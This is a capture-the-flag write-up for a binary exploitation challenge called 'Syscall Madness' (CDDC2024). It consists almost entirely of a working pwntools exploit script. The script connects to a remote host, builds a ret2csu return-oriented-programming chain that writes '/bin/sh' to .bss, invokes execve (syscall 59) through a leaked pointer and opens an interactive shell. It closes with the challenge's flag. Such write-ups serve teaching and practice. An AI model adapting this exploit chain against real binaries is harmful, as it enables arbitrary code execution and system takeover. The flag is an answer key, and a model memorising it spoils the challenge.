Syscall Madness
- Technique:
Ret2Csu
Syscall
Script
from pwn import *
# Load the challenge binary; assigning it to context.binary also sets the
# pwntools arch/endianness used by asm() and p64() below.
elf = context.binary = ELF('syscall_madness')
# Gadget finder over the binary's own code (no libc is involved in this chain).
rop = ROP(elf)
# Target: the remote challenge instance. The two commented lines are the
# local alternatives used while developing (plain process, or under gdb with
# a breakpoint at 0x401178).
r = remote("3.1.147.170", 10009)
# r = elf.process()
# r = gdb.debug('./syscall_madness', gdbscript='''break * 0x401178''')
# pad
# 16 bytes of filler before the first gadget address. The offset is taken as
# given by the challenge; it is not derived anywhere in this script.
padding: bytes = b'A' * 16
# Writable scratch area in .bss (offset 0x28 past the section start); the
# "/bin/sh" string sent later is read into this address.
bss = elf.bss() + 0x28
# gets@plt / symbol address, used to read the second line into `bss`.
gets = elf.symbols.gets
# Hard-coded address of a syscall gadget.
# NOTE(review): `syscall` is never referenced by read_payload below; the
# syscall instruction is presumably reached through `reg_call` + `gift`
# instead — confirm against the disassembly.
syscall = 0x401152
# First bare `ret` in the binary; appended as the last entry of the chain.
ret = next(elf.search(asm('ret')))
# gadgets
# Register-control gadgets located automatically by the ROP helper.
pop_rax = rop.find_gadget(['pop rax', 'ret']).address
pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address
# Hard-coded rather than found via rop.find_gadget.
# NOTE(review): `pop_rsi` is also unused by read_payload.
pop_rsi = 0x401299
# ret2csu
# The two gadget halves of the ret2csu technique: `pop_chain` pops a run of
# callee-saved registers, `reg_call` then calls through one of them.
# Which registers each value below lands in is not visible here — verify
# against the __libc_csu_init disassembly. All addresses in this script are
# absolute, so they assume the binary is loaded at a fixed (non-PIE) base.
pop_chain = 0x401294
reg_call = 0x401278
# The service prints two hex values on connect: an already-open fd for
# flag.txt, and the address of `gift` (a pointer the csu call goes through).
r.recvuntil(b'flag.txt fd is ')
fd: int = int(r.recvuntil(b'\n', drop=True).decode(),16)
r.recvuntil(b'&gift :')
gift: int = int(r.recvuntil(b'\n', drop=True).decode(),16)
# Chain layout, in execution order:
#   1. pop rdi = bss ; call gets     -> reads the next line ("/bin/sh\0") to bss
#   2. pop_chain with bss, 0, 0, gift -> loads the csu registers (argument
#      registers for the later call; exact mapping per the note above)
#   3. pop rax = 59                  -> 59 is SYS_execve on x86-64 Linux
#   4. reg_call                      -> performs the call through `gift`
#   5. ret                           -> trailing ret gadget
# `fd` is parsed above but not used in this chain.
read_payload: bytes = padding + p64(pop_rdi) + p64(bss) + p64(gets) + p64(pop_chain) + p64(bss) + p64(0) + p64(0x0) + p64(gift) + p64(pop_rax) + p64(59) + p64(reg_call) + p64(ret)
r.sendline(read_payload)
# Second line: consumed by the gets() call in step 1 and stored at `bss`.
r.sendline(b'/bin/sh\x00')
# Hand the connection over to the user once the chain has run.
r.interactive()
Flag
CDDC2024{D0_YOU_KNOW_4B0UT_SYSC4LL?}